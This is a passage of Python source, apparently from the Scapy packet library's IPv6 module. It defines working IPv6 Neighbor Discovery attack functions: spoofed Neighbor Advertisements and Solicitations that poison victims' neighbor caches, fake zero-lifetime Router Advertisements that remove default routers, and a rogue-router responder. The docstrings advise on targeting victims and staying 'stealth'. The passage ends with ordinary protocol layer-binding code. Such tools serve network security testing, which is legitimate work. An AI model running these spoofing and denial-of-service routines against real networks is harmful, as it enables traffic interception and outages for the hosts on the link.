3731 def na_reply_callback(req, reply_mac, iface):
3732 """
3733 Callback that reply to a NS with a NA
3734 """
3736 # Let's build a reply and send it
3737 mac = req[Ether].src
3738 dst = req[IPv6].dst
3739 tgt = req[ICMPv6ND_NS].tgt
3740 rep = Ether(src=reply_mac) / IPv6(src=tgt, dst=dst)
3741 rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1) # noqa: E741
3742 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
3743 sendp(rep, iface=iface, verbose=0)
3745 print("Reply NA for target address %s (received from %s)" % (tgt, mac))
3747 _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter,
3748 tgt_filter, reply_mac)
3751def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None,
3752 reply_mac=None, router=False):
3753 """
3754 The main purpose of this function is to send fake Neighbor Advertisement
3755 messages to a victim. As the emission of unsolicited Neighbor Advertisement
3756 is pretty pointless (from an attacker standpoint) because it will not
3757 lead to a modification of a victim's neighbor cache, the function send
3758 advertisements in response to received NS (NS sent as part of the DAD,
3759 i.e. with an unspecified address as source, are not considered).
3761 By default, the fake NA sent to create the DoS uses:
3762 - as target address the target address found in received NS.
3763 - as IPv6 source address: the target address
3764 - as IPv6 destination address: the source IPv6 address of received NS
3765 message.
3766 - the mac address of the interface as source (or reply_mac, see below).
3767 - the source mac address of the received NS as destination macs address
3768 of the emitted NA.
3769 - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr)
3770 filled with the mac address used as source of the NA.
3772 Following arguments can be used to change the behavior:
3774 iface: a specific interface (e.g. "eth0") of the system on which the
3775 DoS should be launched. If None is provided conf.iface is used.
3777 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
3778 Only NS messages received from this source will trigger replies.
3779 This allows limiting the effects of the DoS to a single target by
3780 filtering on its mac address. The default value is None: the DoS
3781 is not limited to a specific mac address.
3783 tgt_filter: Same as previous but for a specific target IPv6 address for
3784 received NS. If the target address in the NS message (not the IPv6
3785 destination address) matches that address, then a fake reply will
3786 be sent, i.e. the emitter will be a target of the DoS.
3788 reply_mac: allow specifying a specific source mac address for the reply,
3789 i.e. to prevent the use of the mac address of the interface. This
3790 address will also be used in the Target Link-Layer Address option.
3792 router: by the default (False) the 'R' flag in the NA used for the reply
3793 is not set. If the parameter is set to True, the 'R' flag in the
3794 NA is set, advertising us as a router.
3796 Please, keep the following in mind when using the function: for obvious
3797 reasons (kernel space vs. Python speed), when the target of the address
3798 resolution is on the link, the sender of the NS receives 2 NA messages
3799 in a row, the valid one and our fake one. The second one will overwrite
3800 the information provided by the first one, i.e. the natural latency of
3801 Scapy helps here.
3803 In practice, on a common Ethernet link, the emission of the NA from the
3804 genuine target (kernel stack) usually occurs in the same millisecond as
3805 the receipt of the NS. The NA generated by Scapy6 will usually come after
3806 something 20+ ms. On a usual testbed for instance, this difference is
3807 sufficient to have the first data packet sent from the victim to the
3808 destination before it even receives our fake NA.
3809 """
3811 def is_request(req, mac_src_filter, tgt_filter):
3812 """
3813 Check if packet req is a request
3814 """
3816 # Those simple checks are based on Section 5.4.2 of RFC 4862
3817 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
3818 return 0
3820 mac_src = req[Ether].src
3821 if mac_src_filter and mac_src != mac_src_filter:
3822 return 0
3824 # Source must NOT be the unspecified address
3825 if req[IPv6].src == "::":
3826 return 0
3828 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
3829 if tgt_filter and tgt != tgt_filter:
3830 return 0
3832 dst = req[IPv6].dst
3833 if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast.
3835 # If this is a real address resolution NS, then the destination
3836 # address of the packet is the link-local solicited node multicast
3837 # address associated with the target of the NS.
3838 # Otherwise, the NS is a NUD related one, i.e. the peer is
3839 # unicasting the NS to check the target is still alive (L2
3840 # information is still in its cache and it is verified)
3841 received_snma = inet_pton(socket.AF_INET6, dst)
3842 expected_snma = in6_getnsma(tgt)
3843 if received_snma != expected_snma:
3844 print("solicited node multicast @ does not match target @!")
3845 return 0
3847 return 1
3849 def reply_callback(req, reply_mac, router, iface):
3850 """
3851 Callback that reply to a NS with a spoofed NA
3852 """
3854 # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and
3855 # send it back.
3856 mac = req[Ether].src
3857 pkt = req[IPv6]
3858 src = pkt.src
3859 tgt = req[ICMPv6ND_NS].tgt
3860 rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src)
3861 # Use the target field from the NS
3862 rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # noqa: E741
3864 # "If the solicitation IP Destination Address is not a multicast
3865 # address, the Target Link-Layer Address option MAY be omitted"
3866 # Given our purpose, we always include it.
3867 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
3869 sendp(rep, iface=iface, verbose=0)
3871 print("Reply NA for target address %s (received from %s)" % (tgt, mac))
3873 if not iface:
3874 iface = conf.iface
3875 # To prevent sniffing our own traffic
3876 if not reply_mac:
3877 reply_mac = get_if_hwaddr(iface)
3878 sniff_filter = "icmp6 and not ether src %s" % reply_mac
3880 router = 1 if router else 0 # Value of the R flags in NA
3882 sniff(store=0,
3883 filter=sniff_filter,
3884 lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
3885 prn=lambda x: reply_callback(x, reply_mac, router, iface),
3886 iface=iface)
3889def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1",
3890 dst=None, src_mac=None, dst_mac=None, loop=True,
3891 inter=1, iface=None):
3892 """
3893 The main purpose of this function is to send fake Neighbor Solicitations
3894 messages to a victim, in order to either create a new entry in its neighbor
3895 cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated
3896 that a node SHOULD create the entry or update an existing one (if it is not
3897 currently performing DAD for the target of the NS). The entry's reachability # noqa: E501
3898 state is set to STALE.
3900 The two main parameters of the function are the source link-layer address
3901 (carried by the Source Link-Layer Address option in the NS) and the
3902 source address of the packet.
3904 Unlike some other NDP_Attack_* function, this one is not based on a
3905 stimulus/response model. When called, it sends the same NS packet in loop
3906 every second (the default)
3908 Following arguments can be used to change the format of the packets:
3910 src_lladdr: the MAC address used in the Source Link-Layer Address option
3911 included in the NS packet. This is the address that the peer should
3912 associate in its neighbor cache with the IPv6 source address of the
3913 packet. If None is provided, the mac address of the interface is
3914 used.
3916 src: the IPv6 address used as source of the packet. If None is provided,
3917 an address associated with the emitting interface will be used
3918 (based on the destination address of the packet).
3920 target: the target address of the NS packet. If no value is provided,
3921 a dummy address (2001:db8::1) is used. The value of the target
3922 has a direct impact on the destination address of the packet if it
3923 is not overridden. By default, the solicited-node multicast address
3924 associated with the target is used as destination address of the
3925 packet. Consider specifying a specific destination address if you
3926 intend to use a target address different than the one of the victim.
3928 dst: The destination address of the NS. By default, the solicited node
3929 multicast address associated with the target address (see previous
3930 parameter) is used if no specific value is provided. The victim
3931 is not expected to check the destination address of the packet,
3932 so using a multicast address like ff02::1 should work if you want
3933 the attack to target all hosts on the link. On the contrary, if
3934 you want to be more stealth, you should provide the target address
3935 for this parameter in order for the packet to be sent only to the
3936 victim.
3938 src_mac: the MAC address used as source of the packet. By default, this
3939 is the address of the interface. If you want to be more stealth,
3940 feel free to use something else. Note that this address is not the
3941 that the victim will use to populate its neighbor cache.
3943 dst_mac: The MAC address used as destination address of the packet. If
3944 the IPv6 destination address is multicast (all-nodes, solicited
3945 node, ...), it will be computed. If the destination address is
3946 unicast, a neighbor solicitation will be performed to get the
3947 associated address. If you want the attack to be stealth, you
3948 can provide the MAC address using this parameter.
3950 loop: By default, this parameter is True, indicating that NS packets
3951 will be sent in loop, separated by 'inter' seconds (see below).
3952 When set to False, a single packet is sent.
3954 inter: When loop parameter is True (the default), this parameter provides
3955 the interval in seconds used for sending NS packets.
3957 iface: to force the sending interface.
3958 """
3960 if not iface:
3961 iface = conf.iface
3963 # Use provided MAC address as source link-layer address option
3964 # or the MAC address of the interface if none is provided.
3965 if not src_lladdr:
3966 src_lladdr = get_if_hwaddr(iface)
3968 # Prepare packets parameters
3969 ether_params = {}
3970 if src_mac:
3971 ether_params["src"] = src_mac
3973 if dst_mac:
3974 ether_params["dst"] = dst_mac
3976 ipv6_params = {}
3977 if src:
3978 ipv6_params["src"] = src
3979 if dst:
3980 ipv6_params["dst"] = dst
3981 else:
3982 # Compute the solicited-node multicast address
3983 # associated with the target address.
3984 tmp = inet_ntop(socket.AF_INET6,
3985 in6_getnsma(inet_pton(socket.AF_INET6, target)))
3986 ipv6_params["dst"] = tmp
3988 pkt = Ether(**ether_params)
3989 pkt /= IPv6(**ipv6_params)
3990 pkt /= ICMPv6ND_NS(tgt=target)
3991 pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr)
3993 sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0)
3996def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None,
3997 ip_src_filter=None, reply_mac=None,
3998 tgt_mac=None):
3999 """
4000 The purpose of the function is to monitor incoming RA messages
4001 sent by default routers (RA with a non-zero Router Lifetime values)
4002 and invalidate them by immediately replying with fake RA messages
4003 advertising a zero Router Lifetime value.
4005 The result on receivers is that the router is immediately invalidated,
4006 i.e. the associated entry is discarded from the default router list
4007 and destination cache is updated to reflect the change.
4009 By default, the function considers all RA messages with a non-zero
4010 Router Lifetime value but provides configuration knobs to allow
4011 filtering RA sent by specific routers (Ethernet source address).
4012 With regard to emission, the multicast all-nodes address is used
4013 by default but a specific target can be used, in order for the DoS to
4014 apply only to a specific host.
4016 More precisely, following arguments can be used to change the behavior:
4018 iface: a specific interface (e.g. "eth0") of the system on which the
4019 DoS should be launched. If None is provided conf.iface is used.
4021 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
4022 Only RA messages received from this source will trigger replies.
4023 If other default routers advertised their presence on the link,
4024 their clients will not be impacted by the attack. The default
4025 value is None: the DoS is not limited to a specific mac address.
4027 ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
4028 on. Only RA messages received from this source address will trigger
4029 replies. If other default routers advertised their presence on the
4030 link, their clients will not be impacted by the attack. The default
4031 value is None: the DoS is not limited to a specific IPv6 source
4032 address.
4034 reply_mac: allow specifying a specific source mac address for the reply,
4035 i.e. to prevent the use of the mac address of the interface.
4037 tgt_mac: allow limiting the effect of the DoS to a specific host,
4038 by sending the "invalidating RA" only to its mac address.
4039 """
4041 def is_request(req, mac_src_filter, ip_src_filter):
4042 """
4043 Check if packet req is a request
4044 """
4046 if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req):
4047 return 0
4049 mac_src = req[Ether].src
4050 if mac_src_filter and mac_src != mac_src_filter:
4051 return 0
4053 ip_src = req[IPv6].src
4054 if ip_src_filter and ip_src != ip_src_filter:
4055 return 0
4057 # Check if this is an advertisement for a Default Router
4058 # by looking at Router Lifetime value
4059 if req[ICMPv6ND_RA].routerlifetime == 0:
4060 return 0
4062 return 1
4064 def ra_reply_callback(req, reply_mac, tgt_mac, iface):
4065 """
4066 Callback that sends an RA with a 0 lifetime
4067 """
4069 # Let's build a reply and send it
4071 src = req[IPv6].src
4073 # Prepare packets parameters
4074 ether_params = {}
4075 if reply_mac:
4076 ether_params["src"] = reply_mac
4078 if tgt_mac:
4079 ether_params["dst"] = tgt_mac
4081 # Basis of fake RA (high pref, zero lifetime)
4082 rep = Ether(**ether_params) / IPv6(src=src, dst="ff02::1")
4083 rep /= ICMPv6ND_RA(prf=1, routerlifetime=0)
4085 # Add it a PIO from the request ...
4086 tmp = req
4087 while ICMPv6NDOptPrefixInfo in tmp:
4088 pio = tmp[ICMPv6NDOptPrefixInfo]
4089 tmp = pio.payload
4090 del pio.payload
4091 rep /= pio
4093 # ... and source link layer address option
4094 if ICMPv6NDOptSrcLLAddr in req:
4095 mac = req[ICMPv6NDOptSrcLLAddr].lladdr
4096 else:
4097 mac = req[Ether].src
4098 rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac)
4100 sendp(rep, iface=iface, verbose=0)
4102 print("Fake RA sent with source address %s" % src)
4104 if not iface:
4105 iface = conf.iface
4106 # To prevent sniffing our own traffic
4107 if not reply_mac:
4108 reply_mac = get_if_hwaddr(iface)
4109 sniff_filter = "icmp6 and not ether src %s" % reply_mac
4111 sniff(store=0,
4112 filter=sniff_filter,
4113 lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
4114 prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface),
4115 iface=iface)
4118def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None,
4119 ip_src_filter=None):
4120 """
4121 The purpose of this function is to send provided RA message at layer 2
4122 (i.e. providing a packet starting with IPv6 will not work) in response
4123 to received RS messages. In the end, the function is a simple wrapper
4124 around sendp() that monitor the link for RS messages.
4126 It is probably better explained with an example:
4128 >>> ra = Ether()/IPv6()/ICMPv6ND_RA()
4129 >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
4130 >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64)
4131 >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
4132 >>> NDP_Attack_Fake_Router(ra, iface="eth0")
4133 Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573
4134 Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae
4135 ...
4137 Following arguments can be used to change the behavior:
4139 ra: the RA message to send in response to received RS message.
4141 iface: a specific interface (e.g. "eth0") of the system on which the
4142 DoS should be launched. If none is provided, conf.iface is
4143 used.
4145 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
4146 Only RS messages received from this source will trigger a reply.
4147 Note that no changes to provided RA is done which imply that if
4148 you intend to target only the source of the RS using this option,
4149 you will have to set the Ethernet destination address to the same
4150 value in your RA.
4151 The default value for this parameter is None: no filtering on the
4152 source of RS is done.
4154 ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
4155 on. Only RS messages received from this source address will trigger
4156 replies. Same comment as for previous argument apply: if you use
4157 the option, you will probably want to set a specific Ethernet
4158 destination address in the RA.
4159 """
4161 def is_request(req, mac_src_filter, ip_src_filter):
4162 """
4163 Check if packet req is a request
4164 """
4166 if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req):
4167 return 0
4169 mac_src = req[Ether].src
4170 if mac_src_filter and mac_src != mac_src_filter:
4171 return 0
4173 ip_src = req[IPv6].src
4174 if ip_src_filter and ip_src != ip_src_filter:
4175 return 0
4177 return 1
4179 def ra_reply_callback(req, iface):
4180 """
4181 Callback that sends an RA in reply to an RS
4182 """
4184 src = req[IPv6].src
4185 sendp(ra, iface=iface, verbose=0)
4186 print("Fake RA sent in response to RS from %s" % src)
4188 if not iface:
4189 iface = conf.iface
4190 sniff_filter = "icmp6"
4192 sniff(store=0,
4193 filter=sniff_filter,
4194 lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
4195 prn=lambda x: ra_reply_callback(x, iface),
4196 iface=iface)
4198#############################################################################
4199# Pre-load classes ##
4200#############################################################################
4203def _get_cls(name):
4204 return globals().get(name, Raw)
4207def _load_dict(d):
4208 for k, v in d.items():
4209 d[k] = _get_cls(v)
4212_load_dict(icmp6ndoptscls)
4213_load_dict(icmp6typescls)
4214_load_dict(ipv6nhcls)
4216#############################################################################
4217#############################################################################
4218# Layers binding #
4219#############################################################################
4220#############################################################################
4222conf.l3types.register(ETH_P_IPV6, IPv6)
4223conf.l3types.register_num2layer(ETH_P_ALL, IPv46)
4224conf.l2types.register(31, IPv6)
4225conf.l2types.register(DLT_IPV6, IPv6)
4226conf.l2types.register(DLT_RAW, IPv46)
4227conf.l2types.register_num2layer(DLT_RAW_ALT, IPv46)
4228if OPENBSD:
4229 conf.l2types.register_num2layer(229, IPv6)
4231bind_layers(Ether, IPv6, type=0x86dd)
4232bind_layers(CookedLinux, IPv6, proto=0x86dd)
4233bind_layers(GRE, IPv6, proto=0x86dd)
4234bind_layers(SNAP, IPv6, code=0x86dd)
4235# AF_INET6 values are platform-dependent. For a detailed explaination, read
4236# https://github.com/the-tcpdump-group/libpcap/blob/f98637ad7f086a34c4027339c9639ae1ef842df3/gencode.c#L3333-L3354 # noqa: E501
4237if WINDOWS:
4238 bind_layers(Loopback, IPv6, type=0x18)
4239else:
4240 bind_layers(Loopback, IPv6, type=socket.AF_INET6)
4241bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP)
4242bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP)
4243bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP)
4244bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP)
4245bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6)
4246bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6)
4247bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP)
4248bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE)